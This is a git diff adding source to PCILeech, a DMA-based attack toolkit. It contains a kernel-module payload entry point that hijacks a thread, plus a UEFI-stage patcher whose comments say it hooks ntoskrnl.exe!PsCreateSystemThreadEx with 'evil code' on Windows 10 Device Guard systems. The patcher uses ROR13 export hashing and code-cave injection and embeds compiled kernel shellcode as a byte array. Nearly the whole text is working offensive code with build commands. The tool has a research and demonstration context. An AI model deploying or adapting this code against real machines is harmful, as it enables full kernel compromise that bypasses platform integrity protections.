+ PVOID(*MmAllocateContiguousMemory)(SIZE_T, PHYSICAL_ADDRESS);
+ PHYSICAL_ADDRESS(*MmGetPhysicalAddress)(PVOID);
+ VOID(*RtlZeroMemory)(PVOID, SIZE_T);
+ PVOID pvKMD, pvPA1000;
+ PKMDDATA pk;
+ DWORD i = 0, NAMES[32];
+ QWORD vaAddrZero;
+ MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+ MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+ MmAllocateContiguousMemory = (PVOID(*)(SIZE_T, PHYSICAL_ADDRESS))PEGetProcAddressH(qwAddrNtosBase, H_MmAllocateContiguousMemory);
+ MmGetPhysicalAddress = (PHYSICAL_ADDRESS(*)(PVOID))PEGetProcAddressH(qwAddrNtosBase, H_MmGetPhysicalAddress);
+ RtlZeroMemory = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_RtlZeroMemory);
+ pvKMD = MmMapIoSpace(0x3000, 0x1000, 0);
+ if(!pvKMD) { return; }
+ RtlZeroMemory(pvKMD, 0x1000);
+ pk = (PKMDDATA)pvKMD;
+ pk->AddrKernelBase = qwAddrNtosBase;
+ pk->MAGIC = 0x0ff11337711333377;
+ pk->OperatingSystem = KMDDATA_OPERATING_SYSTEM_WINDOWS;
+ vaAddrZero = qwAddrKmdBase - *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_KMD_THIS);
+ pk->ReservedKMD[0] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_VFS);
+ pk->ReservedKMD[1] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_KERNEL);
+ pk->ReservedKMD[2] = vaAddrZero + *(PDWORD)(qwAddrKmdBase + DATA_OFFSET_PSCMD_USER);
+ NAMES[i++] = H_ExFreePool;
+ NAMES[i++] = H_MmFreeContiguousMemory;
+ NAMES[i++] = H_MmAllocateContiguousMemory;
+ NAMES[i++] = H_MmGetPhysicalAddress;
+ NAMES[i++] = H_MmGetPhysicalMemoryRanges;
+ NAMES[i++] = H_MmMapIoSpace;
+ NAMES[i++] = H_MmUnmapIoSpace;
+ NAMES[i++] = H_PsCreateSystemThread;
+ NAMES[i++] = H_RtlCopyMemory;
+ NAMES[i++] = H_ZwProtectVirtualMemory;
+ NAMES[i++] = H_KeDelayExecutionThread;
+ while(i) {
+ i--;
+ *((PQWORD)&pk->fn + i) = PEGetProcAddressH(pk->AddrKernelBase, NAMES[i]);
+ }
+ pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+ *(PQWORD)((QWORD)pvPA1000 + 0xc0) = MmGetPhysicalAddress(pvKMD);
+ *(PQWORD)((QWORD)pvPA1000 + 0xb0) = KMDDATA_MAGIC;
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+ stage3_c_MainCommandLoop(pk);
+}
+
+VOID c_EntryPoint(QWORD qwAddrNtosBase, QWORD qwAddrKmdBase, QWORD qwCR3)
+{
+ PVOID(*MmMapIoSpace)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE);
+ VOID(*MmUnmapIoSpace)(PVOID, SIZE_T);
+ PVOID pvPA1000;
+ QWORD count;
+ WORD cTrigger;
+ MmMapIoSpace = (PVOID(*)(PHYSICAL_ADDRESS, SIZE_T, MEMORY_CACHING_TYPE))PEGetProcAddressH(qwAddrNtosBase, H_MmMapIoSpace);
+ MmUnmapIoSpace = (VOID(*)(PVOID, SIZE_T))PEGetProcAddressH(qwAddrNtosBase, H_MmUnmapIoSpace);
+ pvPA1000 = MmMapIoSpace(0x1000, 0x1000, 0);
+ if(!pvPA1000) { return; }
+ if((*(PQWORD)((QWORD)pvPA1000 + 0xa0) == qwCR3)) {
+ cTrigger = *(PWORD)(qwAddrKmdBase + DATA_OFFSET_TRIGGER_COUNT);
+ count = *(PQWORD)((QWORD)pvPA1000 + 0xb8) = *(PQWORD)((QWORD)pvPA1000 + 0xb8) + 1;
+ if(count == cTrigger) {
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+ //INFO: it seems like we cannot create system thread due to security checks
+ //PsCreateSystemThread = (NTSTATUS(*)(PHANDLE, ULONG, POBJECT_ATTRIBUTES, HANDLE, PCLIENT_ID, PKSTART_ROUTINE, PVOID))PEGetProcAddressH(qwAddrNtosBase, H_PsCreateSystemThread);
+ //PsCreateSystemThread(&hThread, 0x1ffff, NULL, NULL, NULL, (PKSTART_ROUTINE)c_EntryPoint_Thread, (PVOID)qwAddrNtosBase);
+ //INFO: hijack is fine with 'security' though =P
+ c_EntryPoint_Thread(qwAddrNtosBase, qwAddrKmdBase);
+ return;
+ }
+ }
+ MmUnmapIoSpace(pvPA1000, 0x1000);
+}
diff --git a/pcileech_shellcode/uefi_winload_ntos_patch.c b/pcileech_shellcode/uefi_winload_ntos_patch.c
new file mode 100644
index 0000000..5892ca7
--- /dev/null
+++ b/pcileech_shellcode/uefi_winload_ntos_patch.c
@@ -0,0 +1,949 @@
+// uefi_winload_ntos_patch.c : hooks/patches ntoskrnl.exe!PsCreateSystemThreadEx with evil code.
+// evil code consists of:
+// - custom kernel module
+// - mount (vfs) payload (use with 'pcileech mount')
+// - pscmd payload (use with 'pcileech wx64_pscmd -9 1')
+//
+// (planned to be used in demo at 34c3)
+//
+// (c) Ulf Frisk, 2017
+// Author: Ulf Frisk, pcileech@frizk.net
+//
+// compile with:
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_common.c
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_patch.c
+// ml64.exe uefi_common_a.asm /Feuefi_winload_ntos_patch.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_patch.obj uefi_common.obj
+// shellcode64.exe -o uefi_winload_ntos_patch.exe "UEFI WINLOAD NTOSKRNL.EXE PATCHER FOR DEVICE GUARD SYSTEMS\n===========================================================\nPatches ntoskrnl.exe!PsCreateSystemThread with executable set separately with\nthe in parameter. Must be run from ExitBootServices. Targets Windows 10 with\nDevice Guard only! Good value for num_threads_skip is 0x50.\nSyntax: pcileech.exe uefi_winload_ntos_patch -in -0 \nGENERAL INFORMATION BELOW:%s\n Status : %016llx\n NTOSKRNL.EXE : %016llx\n Hooked Function : %016llx\n Code Cave VFS : %016llx\n Code Cave KMD : %016llx\n Code Cave CMD #1 : %016llx\n Code Cave CMD #2 : %016llx\n"
+//
+#include "uefi_common.h"
+
+// ----------------------------------------------------------------------------
+// UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* Calculate a ROR13 hash given an ANSI string.
+* -- sz
+* -- return
+*/
+DWORD HashROR13A(LPSTR sz)
+{
+ DWORD dwVal, dwHash = 0;
+ while(*sz) {
+ dwVal = (DWORD)*sz++;
+ dwHash = (dwHash >> 13) | (dwHash << 19);
+ dwHash += dwVal;
+ }
+ return dwHash;
+}
+
+/*
+* Lookup address of function given a module base address and a ROR13 hash.
+* -- hModule = base address of PE to look for function in.
+* -- dwProcNameH = ROR13 hash of function name to lookup.
+* -- return = address of function, 0 = fail.
+*/
+QWORD PEGetProcAddressH(QWORD hModule, DWORD dwProcNameH)
+{
+ PDWORD pdwRVAAddrNames, pdwRVAAddrFunctions;
+ PWORD pwNameOrdinals;
+ DWORD i, dwFnIdx, dwHash;
+ LPSTR sz;
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return 0; }
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return 0; }
+ PIMAGE_EXPORT_DIRECTORY exp = (PIMAGE_EXPORT_DIRECTORY)(ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress + hModule);
+ if(!exp || !exp->NumberOfNames || !exp->AddressOfNames) { return 0; }
+ pdwRVAAddrNames = (PDWORD)(hModule + exp->AddressOfNames);
+ pwNameOrdinals = (PWORD)(hModule + exp->AddressOfNameOrdinals);
+ pdwRVAAddrFunctions = (PDWORD)(hModule + exp->AddressOfFunctions);
+ for(i = 0; i < exp->NumberOfNames; i++) {
+ sz = (LPSTR)(hModule + pdwRVAAddrNames[i]);
+ dwHash = HashROR13A(sz);
+ if(dwHash == dwProcNameH) {
+ dwFnIdx = pwNameOrdinals[i];
+ if(dwFnIdx >= exp->NumberOfFunctions) { return 0; }
+ return (QWORD)(hModule + pdwRVAAddrFunctions[dwFnIdx]);
+ }
+ }
+ return 0;
+}
+
+BOOL PEGetSection(QWORD hModule, QWORD qwSzSection, PDWORD pdwSectionBaseRel, PDWORD pdwSectionSize)
+{
+ PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule; // dos header.
+ if(!dosHeader || dosHeader->e_magic != IMAGE_DOS_SIGNATURE) { return FALSE; }
+ PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(hModule + dosHeader->e_lfanew); // nt header
+ if(!ntHeader || ntHeader->Signature != IMAGE_NT_SIGNATURE) { return FALSE; }
+ int nSections = ntHeader->FileHeader.NumberOfSections;
+ for(int i = 0; i < nSections; i++) {
+ PIMAGE_SECTION_HEADER sectionHeader = (PIMAGE_SECTION_HEADER)(hModule + dosHeader->e_lfanew + sizeof(IMAGE_NT_HEADERS64) + i * sizeof(IMAGE_SECTION_HEADER));
+ if(*(PQWORD)sectionHeader->Name == qwSzSection) {
+ *pdwSectionBaseRel = sectionHeader->VirtualAddress;
+ *pdwSectionSize = sectionHeader->Misc.VirtualSize;
+ return TRUE;
+ }
+ }
+ return FALSE;
+}
+
+// ----------------------------------------------------------------------------
+// "SPECIALIZED" UTILITY FUNCTIONS BELOW:
+// ----------------------------------------------------------------------------
+
+/*
+* When ExitBootServices() is called by winload.efi ntoskrnl.exe (and hvix.exe)
+* are already loaded and integrity checked by winload. The location of ntoskrnl
+* is randomized in memory, but is usually found between address: 0x01000000 and
+* 0x04000000.
+* -- return = base address of ntoskrnl.exe, 0 if fail.
+*/
+QWORD FindNtoskrnl()
+{
+ QWORD qwA, o;
+ BOOL fINITKDBG, fPOOLCODE;
+ for(qwA = 0x01000000; qwA < 0x04000000; qwA += 0x1000) {
+ if(*(PWORD)qwA == 0x5a4d) { // MZ header
+ fINITKDBG = FALSE;
+ fPOOLCODE = FALSE;
+ for(o = 0; o < 0x1000; o += 8) {
+ if(*(PQWORD)(qwA + o) == 0x4742444B54494E49) { // INITKDBG
+ fINITKDBG = TRUE;
+ }
+ if(*(PQWORD)(qwA + o) == 0x45444F434C4F4F50) { // POOLCODE
+ fPOOLCODE = TRUE;
+ }
+ if(fINITKDBG && fPOOLCODE) {
+ return qwA;
+ }
+ }
+ }
+ }
+ return 0;
+}
+
+/*
+* Locate a "code cave" - a place (in an executable section) consisting of zeros
+* in which we can put our main executable payload. Function searches forward
+* given a base address to find such a region of max qwSize bytes. Function is
+* dumb and in rare cases code cave returned might be in NX section.
+* -- hModule = base address to start searching from.
+* -- qwSize = size of code cave to locate; max 0x1000 and even QWORD required.
+* -- return = address of located code cave, 0 if fail.
+*/
+QWORD FindCodeCave(QWORD hModule, QWORD qwSize)
+{
+ QWORD STR_SECTIONS_ALLOWED[] = {
+ 0x000000747865742e, // .text
+ 0x0000000045474150, // PAGE
+ 0x45444f434c4f4f50, // POOLCODE
+ 0x00004b4c45474150, // PAGELK
+ 0x0000444b45474150, // PAGEKD
+ 0x534c444845474150 // PAGEHDLS
+ };
+ DWORD i, dwSectionBaseRel, dwSectionSize;
+ QWORD qwACC;
+ for(i = 0; i < sizeof(STR_SECTIONS_ALLOWED) / sizeof(QWORD); i++) {
+ if(!PEGetSection(hModule, STR_SECTIONS_ALLOWED[i], &dwSectionBaseRel, &dwSectionSize)) { continue; } // section not found
+ if(qwSize > (0x1000 - (dwSectionSize & 0xfff))) { continue; } // code cave too small
+ qwACC = hModule + dwSectionBaseRel + dwSectionSize;
+ if(*(PQWORD)qwACC) { continue; } // not empty - code cave probably already taken ...
+ return qwACC;
+ }
+ return 0;
+}
+
+// ----------------------------------------------------------------------------
+// SHELLCODE MODULES (COMPILED SEPARATELY) BELOW:
+// ----------------------------------------------------------------------------
+
+// specially compiled kernel module payload, compile and extract shellcode with:
+//
+// cl.exe /O1 /Os /Oy /FD /MT /GS- /J /GR- /FAcs /W4 /Zl /c /TC /kernel uefi_winload_ntos_kmd_c.c
+// ml64.exe uefi_winload_ntos_kmd.asm /Feuefi_winload_ntos_kmd.exe /link /NODEFAULTLIB /RELEASE /MACHINE:X64 /entry:main uefi_winload_ntos_kmd_c.obj
+// shellcode64.exe -o uefi_winload_ntos_kmd.exe
+// xxd -i uefi_winload_ntos_kmd.bin
+VOID GetData_KMD(PBYTE *ppb, PDWORD pcb)
+{
+ BYTE WINX64_KMD_BIN[] = {
+ 0xeb, 0x16, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x50, 0x44, 0x0f, 0x20, 0xc0, 0x84, 0xc0, 0x75, 0x6a, 0x53, 0x51, 0x52,
+ 0x57, 0x56, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, 0x41, 0x54,
+ 0x41, 0x55, 0x41, 0x56, 0x41, 0x57, 0x55, 0x48, 0x8d, 0x0d, 0xc2, 0xff,
+ 0xff, 0xff, 0x8b, 0x05, 0xc4, 0xff, 0xff, 0xff, 0x48, 0x2b, 0xc8, 0x8b,
+ 0x05, 0xb7, 0xff, 0xff, 0xff, 0x48, 0x03, 0xc8, 0x48, 0x8d, 0x15, 0xa9,
+ 0xff, 0xff, 0xff, 0x41, 0x0f, 0x20, 0xd8, 0x4c, 0x8b, 0xfc, 0x48, 0x81,
+ 0xec, 0x00, 0x01, 0x00, 0x00, 0x48, 0xc1, 0xec, 0x04, 0x48, 0xc1, 0xe4,
+ 0x04, 0xe8, 0xba, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xe7, 0x5d, 0x41, 0x5f,
+ 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x41, 0x5b, 0x41, 0x5a, 0x41, 0x59,
+ 0x41, 0x58, 0x5e, 0x5f, 0x5a, 0x59, 0x5b, 0x58, 0xc3, 0xcc, 0xcc, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x68, 0x10, 0x48,
+ 0x89, 0x70, 0x18, 0x48, 0x89, 0x78, 0x20, 0x48, 0x63, 0x41, 0x3c, 0x8b,
+ 0xea, 0x33, 0xd2, 0x44, 0x8b, 0x84, 0x08, 0x88, 0x00, 0x00, 0x00, 0x4c,
+ 0x03, 0xc1, 0x45, 0x8b, 0x50, 0x20, 0x41, 0x8b, 0x78, 0x24, 0x4c, 0x03,
+ 0xd1, 0x41, 0x8b, 0x58, 0x1c, 0x48, 0x03, 0xf9, 0x41, 0x8b, 0x70, 0x18,
+ 0x48, 0x03, 0xd9, 0x85, 0xf6, 0x74, 0x2e, 0x45, 0x8b, 0x0a, 0x4c, 0x03,
+ 0xc9, 0x45, 0x33, 0xdb, 0xeb, 0x0d, 0x0f, 0xb6, 0xc0, 0x49, 0xff, 0xc1,
+ 0x41, 0xc1, 0xcb, 0x0d, 0x44, 0x03, 0xd8, 0x41, 0x8a, 0x01, 0x84, 0xc0,
+ 0x75, 0xec, 0x44, 0x3b, 0xdd, 0x74, 0x21, 0xff, 0xc2, 0x49, 0x83, 0xc2,
+ 0x04, 0x3b, 0xd6, 0x72, 0xd2, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x08,
+ 0x48, 0x8b, 0x6c, 0x24, 0x10, 0x48, 0x8b, 0x74, 0x24, 0x18, 0x48, 0x8b,
+ 0x7c, 0x24, 0x20, 0xc3, 0x0f, 0xb7, 0x14, 0x57, 0x41, 0x3b, 0x50, 0x14,
+ 0x73, 0xdf, 0x8b, 0x04, 0x93, 0x48, 0x03, 0xc1, 0xeb, 0xd9, 0xcc, 0xcc,
+ 0x48, 0x89, 0x5c, 0x24, 0x08, 0x48, 0x89, 0x6c, 0x24, 0x10, 0x48, 0x89,
+ 0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xec, 0x20,
+ 0x48, 0x8b, 0xf2, 0x4d, 0x8b, 0xf0, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0x48,
+ 0x8b, 0xe9, 0xe8, 0x39, 0xff, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c,
+ 0x48, 0x8b, 0xcd, 0x48, 0x8b, 0xd8, 0xe8, 0x29, 0xff, 0xff, 0xff, 0x41,
+ 0xbf, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x41, 0x8b, 0xd7, 0x41,
+ 0x8b, 0xcf, 0x48, 0x8b, 0xf8, 0xff, 0xd3, 0x48, 0x85, 0xc0, 0x74, 0x3a,
+ 0x4c, 0x39, 0xb0, 0xa0, 0x00, 0x00, 0x00, 0x75, 0x29, 0x0f, 0xb7, 0x4e,
+ 0x02, 0x48, 0xff, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x39, 0x88, 0xb8,
+ 0x00, 0x00, 0x00, 0x75, 0x15, 0x41, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff,
+ 0xd7, 0x48, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xe8, 0x24, 0x00, 0x00, 0x00,
+ 0xeb, 0x08, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xff, 0xd7, 0x48, 0x8b,
+ 0x5c, 0x24, 0x40, 0x48, 0x8b, 0x6c, 0x24, 0x48, 0x48, 0x8b, 0x74, 0x24,
+ 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
+ 0x48, 0x8b, 0xc4, 0x48, 0x89, 0x58, 0x08, 0x48, 0x89, 0x70, 0x10, 0x48,
+ 0x89, 0x78, 0x18, 0x55, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x41, 0x57,
+ 0x48, 0x8d, 0x68, 0xa1, 0x48, 0x81, 0xec, 0xa0, 0x00, 0x00, 0x00, 0x48,
+ 0x8b, 0xda, 0x48, 0x8b, 0xf1, 0xba, 0xf9, 0xbe, 0xdd, 0x05, 0xe8, 0x89,
+ 0xfe, 0xff, 0xff, 0xba, 0xc9, 0xc5, 0x6e, 0x6c, 0x48, 0x8b, 0xce, 0x4c,
+ 0x8b, 0xf8, 0xe8, 0x79, 0xfe, 0xff, 0xff, 0xba, 0x57, 0x63, 0x32, 0x5a,
+ 0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe0, 0xe8, 0x69, 0xfe, 0xff, 0xff, 0xba,
+ 0xdb, 0x4f, 0x3d, 0xc5, 0x48, 0x8b, 0xce, 0x4c, 0x8b, 0xe8, 0xe8, 0x59,
+ 0xfe, 0xff, 0xff, 0x45, 0x33, 0xc0, 0xba, 0x00, 0x10, 0x00, 0x00, 0xb9,
+ 0x00, 0x30, 0x00, 0x00, 0x4c, 0x8b, 0xf0, 0x41, 0xff, 0xd7, 0x48, 0x8b,
+ 0xf8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x03, 0x01, 0x00, 0x00, 0xba, 0x00,
+ 0x10, 0x00, 0x00, 0x48, 0x8b, 0xc8, 0x41, 0xff, 0xd6, 0x48, 0x89, 0x77,
+ 0x08, 0x4c, 0x8d, 0xb7, 0x58, 0x03, 0x00, 0x00, 0x48, 0xc7, 0x47, 0x50,
+ 0x01, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x75, 0xe3, 0x48, 0xb8, 0x77, 0x33,
+ 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0xc7, 0x45, 0xb7, 0x1f, 0x9d, 0x48,
+ 0x9d, 0x48, 0x89, 0x07, 0x48, 0x8b, 0xd3, 0x8b, 0x4b, 0x08, 0x8b, 0x43,
+ 0x0c, 0x48, 0x2b, 0xd1, 0x48, 0x03, 0xc2, 0xc7, 0x45, 0xbb, 0x92, 0xf5,
+ 0x45, 0x13, 0x48, 0x89, 0x47, 0x58, 0x8b, 0x43, 0x10, 0x48, 0x03, 0xc2,
+ 0xc7, 0x45, 0xbf, 0xbc, 0x1e, 0x36, 0x9f, 0x48, 0x89, 0x47, 0x60, 0x8b,
+ 0x43, 0x14, 0xbb, 0x0b, 0x00, 0x00, 0x00, 0x48, 0x03, 0xc2, 0xc7, 0x45,
+ 0xc3, 0x57, 0x63, 0x32, 0x5a, 0x48, 0x89, 0x47, 0x68, 0xc7, 0x45, 0xc7,
+ 0x6f, 0xa5, 0x77, 0x49, 0xc7, 0x45, 0xcb, 0xf9, 0xbe, 0xdd, 0x05, 0xc7,
+ 0x45, 0xcf, 0xc9, 0xc5, 0x6e, 0x6c, 0xc7, 0x45, 0xd3, 0x02, 0x6b, 0xa0,
+ 0x94, 0xc7, 0x45, 0xd7, 0x9b, 0x97, 0x64, 0xcf, 0xc7, 0x45, 0xdb, 0x89,
+ 0x4d, 0x3f, 0xbc, 0xc7, 0x45, 0xdf, 0x92, 0x6d, 0x58, 0x58, 0x48, 0x8b,
+ 0x4f, 0x08, 0x48, 0x8d, 0x76, 0xfc, 0x8b, 0x16, 0x4d, 0x8d, 0x76, 0xf8,
+ 0xe8, 0x7f, 0xfd, 0xff, 0xff, 0x49, 0x89, 0x06, 0x83, 0xc3, 0xff, 0x75,
+ 0xe5, 0xbe, 0x00, 0x10, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x8b, 0xd6, 0x8b,
+ 0xce, 0x41, 0xff, 0xd7, 0x48, 0x8b, 0xcf, 0x48, 0x8b, 0xd8, 0x41, 0xff,
+ 0xd5, 0x48, 0x89, 0x83, 0xc0, 0x00, 0x00, 0x00, 0x8b, 0xd6, 0x48, 0xb8,
+ 0x77, 0x33, 0x33, 0x11, 0x77, 0x33, 0x11, 0xff, 0x48, 0x8b, 0xcb, 0x48,
+ 0x89, 0x83, 0xb0, 0x00, 0x00, 0x00, 0x41, 0xff, 0xd4, 0x48, 0x8b, 0xcf,
+ 0xe8, 0x23, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x9c, 0x24, 0xa0, 0x00, 0x00,
+ 0x00, 0x49, 0x8b, 0x5b, 0x30, 0x49, 0x8b, 0x73, 0x38, 0x49, 0x8b, 0x7b,
+ 0x40, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c,
+ 0x5d, 0xc3, 0xcc, 0xcc, 0x48, 0x89, 0x5c, 0x24, 0x10, 0x48, 0x89, 0x6c,
+ 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x83, 0xec, 0x20, 0x48, 0x8b,
+ 0xd9, 0x48, 0xc7, 0x44, 0x24, 0x40, 0xf0, 0xd8, 0xff, 0xff, 0xb9, 0x00,
+ 0x00, 0x00, 0x01, 0x41, 0xbe, 0xff, 0xff, 0xff, 0xff, 0x33, 0xed, 0x41,
+ 0x8b, 0xd6, 0x8b, 0xf5, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93, 0x10, 0x03,
+ 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x2c, 0xb9, 0x00,
+ 0x00, 0x40, 0x00, 0x41, 0x8b, 0xd6, 0x48, 0x89, 0x4b, 0x18, 0xff, 0x93,
+ 0x10, 0x03, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x75, 0x12,
+ 0xb8, 0x01, 0x00, 0x00, 0xf0, 0x48, 0x89, 0x6b, 0x18, 0x48, 0x89, 0x43,
+ 0x30, 0xe9, 0xae, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x7b,
+ 0x28, 0xff, 0x93, 0x18, 0x03, 0x00, 0x00, 0x48, 0x89, 0x43, 0x20, 0x41,
+ 0xbe, 0x01, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x83, 0xf8, 0x0f, 0x00, 0x00,
+ 0x4c, 0x89, 0x73, 0x30, 0x48, 0x85, 0xc0, 0x75, 0x23, 0x49, 0x03, 0xf6,
+ 0x48, 0xb8, 0x00, 0xe4, 0x0b, 0x54, 0x02, 0x00, 0x00, 0x00, 0x48, 0x3b,
+ 0xf0, 0x76, 0xde, 0x4c, 0x8d, 0x44, 0x24, 0x40, 0x33, 0xd2, 0x33, 0xc9,
+ 0xff, 0x93, 0x50, 0x03, 0x00, 0x00, 0xeb, 0xcd, 0x48, 0xc7, 0x43, 0x30,
+ 0x02, 0x00, 0x00, 0x00, 0x48, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x2a, 0x01,
+ 0x00, 0x00, 0x48, 0x83, 0xf8, 0x04, 0x75, 0x4c, 0xff, 0x93, 0x20, 0x03,
+ 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x75, 0x06, 0x48, 0x89,
+ 0x6b, 0x38, 0xeb, 0x38, 0x4c, 0x8b, 0xc5, 0x48, 0x39, 0x28, 0x75, 0x06,
+ 0x48, 0x39, 0x68, 0x08, 0x74, 0x09, 0x4d, 0x03, 0xc6, 0x48, 0x83, 0xc0,
+ 0x10, 0xeb, 0xec, 0x49, 0xc1, 0xe0, 0x04, 0x48, 0x8b, 0xd6, 0x48, 0x8b,
+ 0xcf, 0x4c, 0x89, 0x43, 0x48, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48,
+ 0x8b, 0xce, 0xff, 0x93, 0x00, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38,
+ 0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x05, 0x75, 0x18, 0x48, 0x8b,
+ 0xcb, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x05, 0xff, 0x53,
+ 0x60, 0xeb, 0x03, 0xff, 0x53, 0x58, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x8b,
+ 0x83, 0xf8, 0x0f, 0x00, 0x00, 0x49, 0x2b, 0xc6, 0x49, 0x3b, 0xc6, 0x77,
+ 0x5a, 0x48, 0x39, 0xab, 0x68, 0x01, 0x00, 0x00, 0x74, 0x4d, 0x48, 0x8b,
+ 0x53, 0x48, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0x4b, 0x40, 0xff, 0x93, 0x28,
+ 0x03, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85, 0xc0, 0x74, 0x34, 0x4c,
+ 0x8b, 0x43, 0x48, 0x4c, 0x39, 0xb3, 0xf8, 0x0f, 0x00, 0x00, 0x75, 0x08,
+ 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcf, 0xeb, 0x06, 0x48, 0x8b, 0xd7, 0x48,
+ 0x8b, 0xce, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x53, 0x48,
+ 0x48, 0x8b, 0xce, 0xff, 0x93, 0x30, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73,
+ 0x38, 0xeb, 0x04, 0x48, 0x89, 0x6b, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f,
+ 0x00, 0x00, 0x06, 0x75, 0x15, 0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xcf,
+ 0x48, 0x8b, 0x53, 0x40, 0xff, 0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89,
+ 0x73, 0x38, 0x48, 0x83, 0xbb, 0xf8, 0x0f, 0x00, 0x00, 0x07, 0x75, 0x15,
+ 0x4c, 0x8b, 0x43, 0x48, 0x48, 0x8b, 0xd7, 0x48, 0x8b, 0x4b, 0x40, 0xff,
+ 0x93, 0x40, 0x03, 0x00, 0x00, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0xab,
+ 0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0xf5, 0xe9, 0x91, 0xfe, 0xff, 0xff,
+ 0xb8, 0x00, 0x00, 0x00, 0xf0, 0x48, 0x8b, 0xcf, 0x48, 0x89, 0x43, 0x30,
+ 0xff, 0x93, 0x08, 0x03, 0x00, 0x00, 0x48, 0x89, 0x6b, 0x20, 0x48, 0x89,
+ 0x6b, 0x28, 0x4c, 0x89, 0x73, 0x38, 0x48, 0x89, 0x2b, 0x48, 0x89, 0xab,
+ 0xf8, 0x0f, 0x00, 0x00, 0x48, 0x8b, 0x5c, 0x24, 0x48, 0x48, 0x8b, 0x6c,
+ 0x24, 0x50, 0x48, 0x83, 0xc4, 0x20, 0x41, 0x5e, 0x5f, 0x5e, 0xc3
+ };
+ *ppb = WINX64_KMD_BIN;
+ *pcb = sizeof(WINX64_KMD_BIN);
+}
+
+// standard wx64_vfs payload, compile and extract shellcode with:
+//
